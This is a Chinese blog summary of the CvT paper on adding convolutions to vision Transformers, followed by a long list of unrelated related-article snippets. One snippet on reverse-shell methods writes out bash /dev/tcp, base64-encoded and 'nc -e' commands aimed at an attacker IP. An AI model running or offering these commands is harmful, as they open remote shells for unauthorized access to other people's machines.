黄小米吖

[Transformer]CvT:Introducing Convolutions to Vision Transformers

CvT:将卷积引入Transformer 

Abstract
Section I Introduction
Section II Related Work
Section III Convolution vision Transformer
- Part 1 Convolutional Token Embedding
- Part 2 Convolution Projection for Attention
- Part 3 Efficiency Considerations
- Part 4 Methodological Discussions
Section IV Experiments
- Part 1 Comparison to SOTA
- Part 2 Ablation Study
Section V Conclusion

Paper
Code

Abstract

本文提出一种新的CvT结构通过向Transformer中引入卷积可以提升ViT的性能。主要由两个改进：首先是包含新的卷积Token嵌入的一种新的Transformer层次结构，二是一种使用卷积映射的Transformer block。
通过这两种改进可以有效将CNN的一些特性，如平移不变性、缩放等引入到Transformer中。在诸多实验中验证了CvT可以以更少的参数量、FLOPs等获得更好的性能；如果在大规模数据集上预训练后性能还会进一步提升。
本文还证实了Transformer中很重要的位置编码模块在Cvt中可以完全被移除，这样简化了处理更高分辨率输入的设计。

Section I Introduction

Transformer广泛用于NLP领域和CV领域，但是在一些任务上仍然逊于对应的CNN网络，尤其在小型数据集上。一种可能的原因是ViT缺少CNN一些独有的特性，比如二维图像拥有很强的局部特征，临近的像素点是高度关联的，CNN就可以通过局部感受野、权重共享和空间的下采样提取这些局部特性，因此CNN具有局部性和平移不变性的特点。此外卷积核的层次结构可以考虑不同空间大小的上下文信息，可以很好的捕获浅层的细节、纹理同时也可以捕获抽象的语义。 
 本文认为卷积可以进一步提升ViT的性能和鲁棒性，目前Transformer享有很高的计算复杂度和内存，为了验证本文的假设提出了CvT结构，将卷积引入到Transformer中来减少FLOPs和参数量。
CvT在Transformer两个核心部分引入了卷积，首先将Transformer划分多个stage，每个stage开始是一个conv token embedding模块，会使用步长卷积来reshape token序列，将其重建回二维形式，这样允许模型既可以捕获局部信息也可以逐渐降低序列长度。其次在每次SA模块之前的linear projection替换为卷积映射，即使用sxs的深度可分离卷积，这样可以进一步不糊哦局部上下文同时减少注意力机制中可能导致的二义性。这样也可以通过控制步长进一步控制计算复杂度。 
因此总结一下，CvT借助了CNN的所有优势：如局部感受野、权重共享、空间采样，同时也保留了所有Transformer的优势，动态注意力、全局感受野、更好的泛化性。并且可以移除位置嵌入模块而不糊降低性能，这样简化了网路哦设计同时使其可以更适合处理不同分辨率的输入，这对许多视觉任务至关重要。

Section II Related Work

Vision Transformer 
 ViT将图像切分成一系列patch然后嵌入成patch序列，送入Transformer层进行处理。Transformer一般包含MHSA,FFN；本文则关注如何将卷积与Transformer结合从而更高效的提取局部和全局特征。 为了很更好的在Vit中建模局部信息也有许多工作做了各种尝试，比如CPVT将位置嵌入模块替换为有条件的位置编码（CPE），可以处理任意大小的输入而不用插值；TNT则是即使用外部的Transformer模块来处理patch embedding又使用内部的Transformer建模像素之间的关联；T2T则是主要通过滑窗的方式来聚合token；PVT则是搭建了多尺度的Transformer模型来处理密集预测任务。与上述工作的不同在于本文尝试如何将卷积引入到Transformer中，Table 1展示了本文与其他工作的区别。
 

Introducin self-attention to CNNs 
 注意力机制被用于CNN模型中来处理视觉任务，比如non-local主要借助全局注意力来提取长程依赖关系；loal-relation nwtworks则根据像素之间的相似性来聚合权重信息，这种自适应的权重调整引入了几何结构这种先验知识到网络中；最近BoTNet则是在ResNet最后三个阶段引入了MHSA，在图像识别任务上取得了大幅提升。本文的方向与之相反，是将卷积引入到Transformer中。
  Introducing Convolutions to Transformers 
  在NLP、语音识别等任务中已经有将卷积引入Transformer的尝试，比如把MHSA替换为卷积层，或者以并行、串联的方式添加卷积层来捕获局部信息。还有的提出将注意力图通过残差连接到后续卷积层中。本文则在Transformer的两个主要部分引入卷积操作，第一是使用卷积投影代替线性投影，二是在多层次结构中使用不同分辨率的2D卷积来reshape token map，这一点和CNN类似。最终显著提升了模型的性能和效率。
  

Section III Convolution vision Transformer

Fig 2展示了CvT的整体结构，卷积引入的部分分别叫做Convolutional Token Embedding和Convolutional Projection。 CvT一共包含3个stage，每个stage由两部分组成，首先输入图像会经过convolutional token embedding层，CTE层会执行类似卷积的操作来处理输入特征图或者是reshape后的2D Token map，随后还会经过一个归一化层，这样会逐渐减少token的数目当然token的宽度也会逐渐增多，这代表着空间分辨率的下降，特征表示更丰富，这也与CNN的处理过程比较类似。但是本文与其他Transformer工作不同在于不会将position embedding添加到token上。
另一部分则是提出的Convolutional Transformer Block，模块中使用深度可分离卷积作为convolitional projection来进行q,k,v的映射，而不再使用ViT中的线性映射。 在最后一个stage添加cls token用于类别的预测。

Part 1 Convolutional Token Embedding

CvT中的卷积操作主要用来建模局部空间上下文信息，这样通过多阶段的网络结构可以获得低级到高级的特征，类似CNN的处理流程。 对于输入的特征图或者reshape的2D Token map,会学习token之间的映射，执行的是步长为s的卷积操作，输出大小为：

在每个stage使用不同的卷及参数这样可以逐渐减少token序列的长度，同时增加每个token的特征维度；这样可使使得token逐渐能够表达更复杂的视觉模式。

Part 2 Convolution Projection for Attention

之前也有尝试在Transformer模块中添加额外的卷积模块用于语音识别和NLP，但是都使得计算更加复杂。因此本文建议使用深度可分离卷积提到原来的线性投影，执行convolutional projection操作。

Fig 3分别展示了原始的linear projection和convolutional projection，以及本文的深度可分离卷积映射。可以看到token会被reshape成2D token map，然后经过深度可分离卷积的处理，最终在将token展平会1D用于后续处理，整个处理流程表述为：

这可以看做是原始Transforemr Block的一种推广，原始的位置信息的投影可以替换为1x1卷积实现。

Part 3 Efficiency Considerations

使用卷积映射有2大好处，一是深度可分离卷积的高效性，使用卷积参数量为s2C2,FLOPs为  C是token channel维度，T是token的数目。 而本文将卷积替换为深度可分离卷积，这样参数量下降到s2C，FLOPs也降到 二是卷积映射可以降低MHSA的计算复杂度。

如果使用卷积核大小为s不同步长的的卷积映射，可以减少token的数目，本文q使用步长=1，k,v的映射均通过步长为2的卷积映射得到。这样k,v的数目就将少了4倍，MHSA中计算复杂度也减少了4倍。也没有带来明显的性能损失，因为图像中相邻像素往往具有语义冗余，而借助卷积的局部性则弥补了由于分辨率降低产生的信息损失。

Part 4 Methodological Discussions

Removing Positional Embeddings 
 因为基于卷积做token embedding以及使用卷积映射使得模型已经建模了局部空间信息，因此可以移除掉位置嵌入信息还不会带来性能下降，也简化了针对不同分辨率的架构设计。 
 Relations to Concurrent Work
  与同期工作的对比，比如T2T ViT会以渐进的方式进行tokenization，还是基于Transformer作为backbone，但是token的长度是固定的。而本文的Cvt会在不同的阶段逐渐减少token长度，同时增加特征表述的丰富性。 PVT通过搭建金字塔形网路结构处理密集预测任务，ViT中输出的特征图只有单一尺度，本文和PVT类似都是多尺度模型，PVT旨在投影中对特征映射护着k/v矩阵进行下采样，本文则是通过步长卷积实现的下采样。

Section IV Experiments

本文会测试Cvt在图像分类并且迁移到其他下游任务的性能。会先在ImageNet数据集上训练然后迁移到下游任务如CIFAR-10，Oxford-IIIT-Pet，Flowers等数据集。

Part 1 Comparison to SOTA

Table 2展示了不同设定下的CvT模型每一个stage的具体信息，并将它们与当前一些SOTA模型进行对比，主要是基于CNN模型和基于Transformer的模型，对比结果参见Table 3。 
  可以看到与Transforemr模型相比，CvT可以在更少参数量和FLOPs下达到更高的精度，CVt-21在ImageNet达到了82.5%的top-1精度，比DeiT_B参数量减少63%，FLOPs减少60%,精度提0.5%。 本文网络的参数量、FLOPs还可以通过NAS进一步减少。
  本文搜索了使用不同步长（1,2）卷积映射到k,v，以及MLP expansion ratio（取2,4）。最终搜索的结果是CvT-13-NAS,具体设定为:
   stage 1：stride=2 Mlp Ratio=2
    stage 2：stride=1 Mlp Ratio=4 
    stage 3：stride=2 Mlp Ratio=2
    

与CNN模型相比，则是进一步缩小了与卷积对应模型的差距，比如CVT-13比ResNet性能提升了3.2%但是参数量只有20M，ResNet是它的三倍。并且随着数据量越来越多，CvT的性能会进一步提升。 Table 4展示了在ImageNet预训练后迁移到下游不同任务后的结果，可以看到预训练后的Cvt在所有下游任务都取得了最佳性能。

Part 2 Ablation Study

接下来还进行了消融实验验证本文一系列设计的有效性。
 Removing Position Embedding 
 Tabel 5显示在不同阶段移除位置嵌入模块都没有影响Cvt的性能；相比DeiT-S,移除位置嵌入会使得精度下降1.8%,因为无法建模图像的空间关系，这进一步证明了本文引入卷积的有效性。 位置嵌入通常是固定长度的可学习向量，这就限制了模型接受自适应变化长度的输入，但是通用的视觉模型应该能够接受可变的图像分辨率。
 CPVT尝试使用条件位置编码，而Cvt则是完全移除了位置编码模块，使得视觉模型的设计更加简洁。 
 

Convolutional Token Embedding 
 Table 6展示了使用卷积token embedding的有效性，可以看大使用互不重叠的patch embedding时精度下降了0.8% ；位置嵌入结合卷积embedding时有0.3%的提升。这些实验结果说明convolutional token embedding的使用有助于性能的提升，并且不需要位置嵌入的帮助。
  Convolutional Projection 
  Table 7展示了使用不同步长的卷积进行映射的节骨，可以看到key stride=2会有0.3%的性能下降，但是FLOPs却减少了30%,因此本文使用stride=2对key,value进行卷积映射来节省计算和内存成本。 Table 8展示了使用卷积映射了常规的Linearproijection的对比，可以看到精度从80.6%提升到81.5% 。此外可以看到随着stage的增多性能会不断提升，验证了本文的Cvt是一种有效的建模策略。
  

Section V Conclusion

本文提出一种将卷积融合进Transformer的CvT模型，可以有效的结合卷积和Transformer的优势用于图像识别任务。大量的实验结果表明通过卷积嵌入和卷积投影，以及这种多阶段设计使得CvT在保证计算效率的同时有效提升了性能。此外由于引入了卷积操作获取了局部上下文，CvT还不需要使用位置嵌入，这使得它可以适应不同分辨率的输入，具有更大的应用潜力。

鲲鹏加速引擎故障排查思路 hid_clf-2oizpt7skaq linux 运维服务器
一、加速器软件逻辑架构二、编译类问题排查思路步骤一、检查固件版本检查项：检查固件版本是否已升级到鲲鹏加速引擎所支持的版本，即iBMCV365及以上版本。该步骤可能出现的问题：由于固件未升级可能导致鲲鹏加速引擎的硬件设备未被使能，在安装鲲鹏加速软件时可能会报“nosuchdevice”错误信息。步骤二、检查license检查项：检查license是否已经安装；若license已安装，是否已生效。该步
OpenCV让Python实现人脸特征点检测 Python编程之道 Python编程之道 opencv python 人工智能 ai
OpenCV让Python实现人脸特征点检测关键词：OpenCV、Python、人脸检测、特征点定位、计算机视觉、Dlib、深度学习摘要：本文将深入探讨如何使用OpenCV和Python实现人脸特征点检测。我们将从基础概念开始，逐步介绍人脸检测和特征点定位的核心算法原理，包括传统的Haar级联检测器和基于深度学习的Dlib面部特征点检测器。文章将提供详细的代码实现和数学原理讲解，并通过实际项目案例
使用 C++ 和 OpenCV 构建驾驶员疲劳检测软件 whoarethenext c++opencv 开发语言
使用C++和OpenCV构建驾驶员疲劳检测软件重要声明：本文所描述的软件是一个概念验证的原型，绝对不能用作现实世界中的安全系统。真正的车载安全系统需要经过大量的测试、具备冗余设计并通过专业认证，以确保其绝对可靠。驾驶疲劳是全球范围内引发交通事故的主要原因之一。当驾驶员感到困倦时，他们的反应时间会变慢，决策能力会下降，而在方向盘后睡着的风险则会急剧增加。为了解决这一关键问题，计算机视觉技术提供了一个
ChatGPT、DeepSeek等大语言模型助力高效办公、论文与项目撰写、数据分析、机器学习与深度学习建模等深度科研 Yolo566Q chatgpt 语言模型数据分析
随着人工智能技术的快速发展，大语言模型如ChatGPT和DeepSeek在科研领域的应用正在为科研人员提供强大的支持。这些模型通过深度学习和大规模语料库训练，能够帮助科研人员高效地筛选文献、生成论文内容、进行数据分析和优化机器学习模型。ChatGPT和DeepSeek能够快速理解和生成复杂的语言，帮助研究人员在撰写论文时提高效率，不仅生成高质量的文章内容，还能优化论文结构和语言表达。在数据分析方面
大语言模型助力高效办公、论文与项目撰写、数据分析、机器学习与深度学习建模等 xiao5kou4chang6kai4 人工智能深度学习机器学习 rnn 语言模型 lstm 深度学习机器学习人工智能 DeepSeek
随着人工智能技术的快速发展，大语言模型如ChatGPT和DeepSeek在科研领域的应用正在为科研人员提供强大的支持。这些模型通过深度学习和大规模语料库训练，能够帮助科研人员高效地筛选文献、生成论文内容、进行数据分析和优化机器学习模型。ChatGPT和DeepSeek能够快速理解和生成复杂的语言，帮助研究人员在撰写论文时提高效率，不仅生成高质量的文章内容，还能优化论文结构和语言表达。在数据分析方面
ChatGPT、DeepSeek等大语言模型助力高效办公、论文与项目撰写、数据分析、机器学习与深度学习建模 asyxchenchong888 chatgpt 语言模型机器学习
随着人工智能技术的快速发展，大语言模型如ChatGPT和DeepSeek在科研领域的应用正在为科研人员提供强大的支持。这些模型通过深度学习和大规模语料库训练，能够帮助科研人员高效地筛选文献、生成论文内容、进行数据分析和优化机器学习模型。ChatGPT和DeepSeek能够快速理解和生成复杂的语言，帮助研究人员在撰写论文时提高效率，不仅生成高质量的文章内容，还能优化论文结构和语言表达。在数据分析方面
ChatGPT、DeepSeek等大语言模型助力高效办公、论文与项目撰写、数据分析、机器学习与深度学习建模等科研应用科研的力量人工智能 ChatGPT chatgpt 语言模型数据分析
随着人工智能技术的快速发展，大语言模型如ChatGPT和DeepSeek在科研领域的应用正在为科研人员提供强大的支持。这些模型通过深度学习和大规模语料库训练，能够帮助科研人员高效地筛选文献、生成论文内容、进行数据分析和优化机器学习模型。ChatGPT和DeepSeek能够快速理解和生成复杂的语言，帮助研究人员在撰写论文时提高效率，不仅生成高质量的文章内容，还能优化论文结构和语言表达。在数据分析方面
C#图像处理-OpenCVSharp教程(三十五) OpenCVSharp运动物体检测(一) Color Space OpenCVSharp C#OpenCV C#图像处理
本文作者ColorSpace，文章未经作者允许禁止转载！本文将介绍OpenCVSharp运动物体检测(一)代码演示：///图片背景差法检测运动物体MatbgImg=Cv2.ImRead("1.bmp");MatfgImg=Cv2.ImRead("55.bmp");Cv2.ImShow("bg",bgImg);Cv2.ImShow("fg",fgImg);Matgray=newMat();Matgr
2025年中总结 Just Jump 人生经历思考反思认知方法 2025年中总结
2025年中总结。一如往年惯例，总结近半年工作中的体悟和经验。一、把大而难的事拆解成小而具体的小目标。专注解决小目标，每周迭代交付，先完成再完善。1.1把大任务拆解成具体可执行的小目标2025年5月起我开始做大模型相关的技术调研、技术升级和开发工作。传统的机器学习、深度学习算法和大模型的算法在技术知识上还是有很大的差异的。想要快速转型使用大模型做开发、训练，是需要些时间和精力投入的，这并不是一个简
AI人工智能中LSTM在视频行为识别的应用
AI人工智能中LSTM在视频行为识别的应用关键词：LSTM、视频行为识别、深度学习、时序建模、计算机视觉、神经网络、动作识别摘要：本文将深入探讨LSTM（长短期记忆网络）在视频行为识别领域的应用。我们将从基础概念出发，逐步讲解LSTM如何解决视频时序建模的挑战，分析其核心算法原理，并通过实际代码示例展示LSTM在行为识别中的具体实现。文章还将探讨当前的应用场景、工具资源以及未来发展趋势，为读者提供
【Transformer论文】通过蒙面多模态聚类预测学习视听语音表示 Wwwilling 推荐系统论文阅读 Transformer系列论文 transformer 聚类多模态
文献题目：LEARNINGAUDIO-VISUALSPEECHREPRESENTATIONBYMASKEDMULTIMODALCLUSTERPREDICTION发表时间：2022发表期刊：ICLR摘要语音的视频记录包含相关的音频和视觉信息，为从说话者的嘴唇运动和产生的声音中学习语音表示提供了强大的信号。我们介绍了视听隐藏单元BERT(AV-HuBERT)，这是一种用于视听语音的自我监督表示学习框架
运筹系列91：vrp算法包PyVRP IE06 运筹学人工智能
1.介绍PyVRP使用HGS（hybridgeneticsearch）算法求解VRP类问题。在benchmark上的评测结果如下，看起来还不错：2.使用例子2.1CVRPCOORDS=[(456,320),#location0-thedepot(228,0),#location1(912,0),#location2(0,80),#location3(114,80),#location4(570,1
高效比较两个list中不同的元素 tanghuan0827 java javaapi
第四种方法，将其中一个list转为map,并通过containsKey()方法比较，用在单元测试，读取dbf文件到redis队列，测试redis和dbf的是否相同packagecom.test;importjava.util.ArrayList;importjava.util.HashMap;importjava.util.List;publicclassTest{publicstaticvoid
告别GPU焦虑：如何在纯CPU服务器上，打造高性能Embedding服务？ ezl1fe embedding 后端人工智能
Hi，大家好，我是ezl1fe。最近接手一个项目，要求在纯CPU服务器上部署Embedding模型服务。兄弟们都懂，GPU它香啊，但它也贵啊！很多时候，咱只能在有限的资源里想办法。一开始，我们图方便，直接从HuggingFace上拉了当时效果最好的BAAI/bge-m3模型，用transformers库一把梭。结果呢？部署到一台8核16G的服务器上，精度是高，但性能也是真的“感人”，单个请求响应要
【自然语言处理-NLP】文本预处理技术云博士的AI课堂哈佛博后带你玩转机器学习深度学习自然语言处理人工智能 NLP 深度学习数据预处理 NLP数据预处理机器学习
以下内容将从基本概念到实用代码分步骤、分场景地详细介绍NLP常见文本预处理方法及其背后的思想。如果无法从外部导入数据，我们会模拟一份简易文本数据（如字符串列表），并在此基础上演示预处理代码及详细解释，确保在常规Python环境下可以运行。一、文本预处理的常见需求和作用在自然语言处理（NLP）任务（如机器学习、深度学习、大模型开发）中，原始文本数据通常会包含各种噪声，例如：多余的空格、换行符、特殊符
深度学习之基于Pytorch卷积神经网络人民币面值识别 Q1744828575 python pytorch plotly
欢迎大家点赞、收藏、关注、评论啦，由于篇幅有限，只展示了部分核心代码。文章目录一项目简介二、功能三、系统四.总结一项目简介一、项目背景在日常生活和商业活动中，人民币面值识别技术具有重要的应用价值。传统的面值识别方法，如基于模板匹配或特征工程的方法，在面对复杂多变的图像环境时，往往难以达到理想的识别效果。随着深度学习技术的兴起，特别是卷积神经网络（ConvolutionalNeuralNetwo
Java宠物类设计：从基础到空指针预防 Cyanto Java java 开发语言
宠物类（Pet）设计首先我们来看一个简单的宠物类设计，这个类包含了宠物的基本属性和行为：publicclassPet{//成员变量(属性)Stringname;//宠物名字Stringbirthday;//出生日期chargender;//性别//成员方法(行为)publicvoideating(){System.out.println("开吃！");}publicvoidrunning(){Sy
高性能AI核心板Z3588CV1：基于瑞芯微RK3588的旗舰级解决方案——8K视觉处理 · 6TOPS NPU算力 · 多场景边缘计算九鼎创展科技嵌入式硬件边缘计算 arm开发 android
RK3588处理器技术细节计算单元CPU：4×[email protected]（大核集群）4×[email protected]（能效集群）支持ARMDynamIQ混合架构，可实现任务智能调度GPU：Mali-G610MP4，支持OpenGLES3.2/2.0/1.1、Vulkan1.28KVPU视频编解码：H.265/H.264/AV1格式，支持60fps实时处理NPU：6TOPS算力（INT
opc server 开发心得 carelg server service input output tags mfc
这段时间公司项目上需要把数据通过OPCSERVER开放接口，在网上及CSDN上SEARCH了好久，感觉CSDN上的资料还是比较专业的，但也有做广告的,我摸索了一周时间，有点心得，并用在工程上，一下是一周体会;一：WINTECH的开发包WINTECH网站上可下载开发包，WTOPCSVR.DLL有VBVCVC#的例程，但是DEMODLL,可运行30分钟，比较容易上手，但对开发者来说不能从内核上了解OP
银河麒麟服务器迁移运维管理平台(接口文档) RZer 麒麟软件运维服务器 android Kylinsoft
银河麒麟高级服务器操作系统V10系统管理员手册文章目录CVE下发接口获取CVE接口获取主机接口获取批次接口获取父日志接口获取子日志接口CVE下发接口功能描述:CVE下发接口调用接口URL:/cve/issue接口类型:POST请求头:API-KEY:your_API_key（内容为APIKey值，需要通过登陆平台，在个人信息处获取）参数:参数名类型含义targetType字符串传入类型（二选一）：
面经总结系列（十六）：元象科技大模型推理优化工程师 GoAI AI面经总结机器学习算法人工智能大模型机器学习深度学习
‍作者简介：CSDN、阿里云人工智能领域博客专家，新星计划计算机视觉导师，百度飞桨PPDE，专注大数据与AI知识分享。✨公众号：GoAI的学习小屋，免费分享书籍、简历、导图等，更有交流群分享宝藏资料，关注公众号回复“加群”或➡️点击链接加群。AI学习星球推荐：GoAI的学习社区知识星球是一个致力于提供《机器学习|深度学习|CV|NLP|大模型|多模态|AIGC》各个最新AI方向综述、论文等成体系的
《深入浅出多模态》(四)：多模态经典模型CLIP GoAI 深入浅出多模态多模态大模型 LLM 人工智能
AI学习星球推荐：GoAI的学习社区知识星球是一个致力于提供《机器学习|深度学习|CV|NLP|大模型|多模态|AIGC》各个最新AI方向综述、论文等成体系的学习资料，配有全面而有深度的专栏内容，包括不限于前沿论文解读、资料共享、行业最新动态以、实践教程、求职相关（简历撰写技巧、面经资料与心得）多方面综合学习平台，强烈推荐AI小白及AI爱好者学习，性价比非常高！加入星球➡️点击链接✨专栏介
深入浅出多模态》（十一）之多模态经典模型：Flamingo系列 GoAI 机器学习多模态大模型人工智能 LLM 机器学习
AI学习星球推荐：GoAI的学习社区知识星球是一个致力于提供《机器学习|深度学习|CV|NLP|大模型|多模态|AIGC》各个最新AI方向综述、论文等成体系的学习资料，配有全面而有深度的专栏内容，包括不限于前沿论文解读、资料共享、行业最新动态以、实践教程、求职相关（简历撰写技巧、面经资料与心得）多方面综合学习平台，强烈推荐AI小白及AI爱好者学习，性价比非常高！加入星球➡️点击链接✨专栏介绍：本作
当前最好的0样本文本转语音是哪个模型？ skywalk8163 多媒体人工智能人工智能 MegaTTS3
综合排名前三模型‌MegaTTS3（字节跳动&浙江大学）‌‌核心优势‌：仅需‌3-10秒‌参考音频即可精准克隆音色，支持中英混合语音自然切换1112轻量化设计（0.45B参数），实时生成延迟低于400ms11采用‌DiffusionTransformer+WaveVAE‌架构，在韵律自然度榜单SpeechArena排名第一11‌开源地址‌：GitHub官方仓库（免费商用）‌MiniMaxSpeec
深度学习目标检测之YOLOv3实战（二）训练自己的图像数据郎郎不会飞深度学习目标识别 python 深度学习
深度学习目标检测之YOLOv3实战（二）训练自己的图像数据数据集准备数据集预处理原demo修改数据集训练目标检测补充二零二零年的大年初一，给大家拜个年，祝大家鼠年吉祥，万事如意，趁着喜气，把Yolov3训练自己的数据过程，记录一下，共勉共进。同样，无人机搭载山狗拍摄的视频，目标检测的种类是模型tank和airplane，部分效果图镇贴：数据集准备首先需要将自己的数据集准备好，不同场景下的目标数据尽
paddlepaddle测试安装_python3.7中安装paddleocr及paddlepaddle包的多种方法瓦啦
升级pippip版本必须升级到20.0.4版本才能应用；方法一、在pycharm中对pip进行升级；方法二、通过命令进行升级python3.7-mpipinstall--upgradepip下载paddleOCR下载链接：https://github.com/PaddlePaddle/PaddleOCR打开paddleOCR文件夹中requirements.txt文件，更改文件中opencv-py
【EI会议征稿】2025年第四届计算机视觉与模式分析国际学术大会（ICCPA 2025）
重要信息2025年5月16-18日|中国·鞍山大会官网：www.iccpa.org会议主页：2025年第五届计算机视觉与模式分析国际学术大会（ICCPA2025）_艾思科蓝_学术一站式服务平台接收/拒稿通知：投稿后1周内收录检索：EICompendex，Scopus主办单位辽宁科技大学往届历史ICCPA前四届均已成功举办，并完成EI、Scopus检索（高录用，稳定检索）
MCP模型上下文协议：AI人工智能模型训练的自动化调参 AI天才研究院 AI人工智能与大数据人工智能自动化运维 ai
MCP模型上下文协议：AI人工智能模型训练的自动化调参关键词：MCP模型、自动化调参、AI训练、超参数优化、上下文协议、机器学习、深度学习摘要：本文深入探讨MCP模型上下文协议在AI模型训练自动化调参中的应用。MCP(ModelContextProtocol)是一种创新的自动化调参框架，通过上下文感知和动态参数调整机制，显著提升模型训练效率和性能。文章将从理论基础、算法实现、数学原理到实际应用进行
各种shell反弹方法 !QK linux 网络安全安全 web安全 bash
1.利用bash进行反弹shell先使用nc进行监听nc-lvvpport端口号再在目标机器执行bash-i>&/dev/tcp/攻击ip/端口0>&1bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjcvMjIzMyAwPiYx}|{base64,-d}|{bash,-i}2.使用nc进行反弹shellnc-e/bin/bash攻击IP端
YOLOv11革命性升级：基于MobileNetv4的UIB和ExtraDW模块重构C3k2架构，实现移动端推理性能飞跃博导ai君深度学习教学-附源码 YOLO 重构
引言与背景概述在当今人工智能飞速发展的时代，目标检测技术已成为计算机视觉领域的核心技术之一。从自动驾驶汽车到智能安防系统，从移动端AR应用到工业质检，目标检测无处不在。然而，随着应用场景的多样化，特别是移动端和边缘设备的普及，对模型的计算效率提出了更为严苛的要求。YOLO（YouOnlyLookOnce）系列算法作为目标检测领域的领军者，一直在精度与速度之间寻求最佳平衡。从YOLOv1到最新的YO
LeetCode[Math] - #66 Plus One Cwind java LeetCode 题解 Algorithm Math
原题链接：#66 Plus One 要求：给定一个用数字数组表示的非负整数，如num1 = {1, 2, 3, 9}, num2 = {9, 9}等，给这个数加上1。注意： 1. 数字的较高位存在数组的头上，即num1表示数字1239 2. 每一位（数组中的每个元素）的取值范围为0~9 难度：简单分析：题目比较简单，只须从数组
JQuery中$.ajax()方法参数详解 AILIKES JavaScript jsonp jquery Ajax json
url: 要求为String类型的参数，（默认为当前页地址）发送请求的地址。 type: 要求为String类型的参数，请求方式（post或get）默认为get。注意其他http请求方法，例如put和 delete也可以使用，但仅部分浏览器支持。 timeout: 要求为Number类型的参数，设置请求超时时间（毫秒）。此设置将覆盖$.ajaxSetup()方法的全局
JConsole & JVisualVM远程监视Webphere服务器JVM Kai_Ge JVisualVM JConsole Webphere
JConsole是JDK里自带的一个工具，可以监测Java程序运行时所有对象的申请、释放等动作，将内存管理的所有信息进行统计、分析、可视化。我们可以根据这些信息判断程序是否有内存泄漏问题。　　使用JConsole工具来分析WAS的JVM问题，需要进行相关的配置。　　首先我们看WAS服务器端的配置. 　　1、登录was控制台https://10.4.119.18
自定义annotation 120153216 annotation
Java annotation 自定义注释@interface的用法一、什么是注释说起注释，得先提一提什么是元数据(metadata)。所谓元数据就是数据的数据。也就是说，元数据是描述数据的。就象数据表中的字段一样，每个字段描述了这个字段下的数据的含义。而J2SE5.0中提供的注释就是java源代码的元数据，也就是说注释是描述java源
CentOS 5/6.X 使用 EPEL YUM源 2002wmj centos
CentOS 6.X 安装使用EPEL YUM源1. 查看操作系统版本[root@node1 ~]# uname -a Linux node1.test.com 2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux [root@node1 ~]#
在SQLSERVER中查找缺失和无用的索引SQL 357029540 SQL Server
--缺失的索引 SELECT avg_total_user_cost * avg_user_impact * ( user_scans + user_seeks ) AS PossibleImprovement , last_user_seek ,
Spring3 MVC 笔记（二） —json+rest优化 7454103 Spring3 MVC
接上次的 spring mvc 注解的一些详细信息！其实也是一些个人的学习笔记呵呵！
替换“\”的时候报错Unexpected internal error near index 1 \ ^ adminjun java “\替换”
发现还是有些东西没有刻子脑子里,,过段时间就没什么概念了,所以贴出来...以免再忘... 在拆分字符串时遇到通过 \ 来拆分，可是用所以想通过转义 \\ 来拆分的时候会报异常 public class Main { /*
POJ 1035 Spell checker(哈希表) aijuans 暴力求解--哈希表
/* 题意：输入字典，然后输入单词，判断字典中是否出现过该单词，或者是否进行删除、添加、替换操作，如果是，则输出对应的字典中的单词要求按照输入时候的排名输出题解：建立两个哈希表。一个存储字典和输入字典中单词的排名，一个进行最后输出的判重 */ #include <iostream> //#define using namespace std; const int HASH =
通过原型实现javascript Array的去重、最大值和最小值 ayaoxinchao JavaScript array prototype
用原型函数（prototype）可以定义一些很方便的自定义函数，实现各种自定义功能。本次主要是实现了Array的去重、获取最大值和最小值。实现代码如下： <script type="text/javascript"> Array.prototype.unique = function() { var a = {}; var le
UIWebView实现https双向认证请求 bewithme UIWebView https Objective-C
什么是HTTPS双向认证我已在先前的博文 ASIHTTPRequest实现https双向认证请求中有讲述，不理解的读者可以先复习一下。本文是用UIWebView来实现对需要客户端证书验证的服务请求，网上有些文章中有涉及到此内容，但都只言片语，没有讲完全，更没有完整的代码，让人困扰不已。但是此知
NoSQL数据库之Redis数据库管理(Redis高级应用之事务处理、持久化操作、pub_sub、虚拟内存) bijian1013 redis 数据库 NoSQL
3.事务处理 Redis对事务的支持目前不比较简单。Redis只能保证一个client发起的事务中的命令可以连续的执行，而中间不会插入其他client的命令。当一个client在一个连接中发出multi命令时，这个连接会进入一个事务上下文，该连接后续的命令不会立即执行，而是先放到一个队列中，当执行exec命令时，redis会顺序的执行队列中
各数据库分页sql备忘 bingyingao oracle sql 分页
ORACLE 下面这个效率很低 SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (SELECT * FROM IPAY_RCD_FS_RETURN order by id desc) A ) WHERE RN <20; 下面这个效率很高 SELECT A.*, ROWNUM RN FROM (SELECT * FROM IPAY_RCD_
【Scala七】Scala核心一：函数 bit1129 scala
1. 如果函数体只有一行代码，则可以不用写{},比如 def print(x: Int) = println(x) 一行上的多条语句用分号隔开，则只有第一句属于方法体，例如 def printWithValue(x: Int) : String= println(x); "ABC" 上面的代码报错，因为，printWithValue的方法
了解GHC的factorial编译过程 bookjovi haskell
GHC相对其他主流语言的编译器或解释器还是比较复杂的，一部分原因是haskell本身的设计就不易于实现compiler，如lazy特性，static typed，类型推导等。关于GHC的内部实现有篇文章说的挺好，这里，文中在RTS一节中详细说了haskell的concurrent实现，里面提到了green thread，如果熟悉Go语言的话就会发现，ghc的concurrent实现和Go有点类
Java-Collections Framework学习与总结-LinkedHashMap BrokenDreams LinkedHashMap
前面总结了java.util.HashMap，了解了其内部由散列表实现，每个桶内是一个单向链表。那有没有双向链表的实现呢？双向链表的实现会具备什么特性呢？来看一下HashMap的一个子类——java.util.LinkedHashMap。
读《研磨设计模式》-代码笔记-抽象工厂模式-Abstract Factory bylijinnan abstract
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ package design.pattern; /* * Abstract Factory Pattern * 抽象工厂模式的目的是： * 通过在抽象工厂里面定义一组产品接口，方便地切换“产品簇” * 这些接口是相关或者相依赖的
压暗面部高光 cherishLC PS
方法一、压暗高光&重新着色当皮肤很油又使用闪光灯时，很容易在面部形成高光区域。下面讲一下我今天处理高光区域的心得：皮肤可以分为纹理和色彩两个属性。其中纹理主要由亮度通道（Lab模式的L通道）决定，色彩则由a、b通道确定。处理思路为在保持高光区域纹理的情况下，对高光区域着色。具体步骤为：降低高光区域的整体的亮度，再进行着色。如果想简化步骤，可以只进行着色（参看下面的步骤1
Java VisualVM监控远程JVM crabdave visualvm
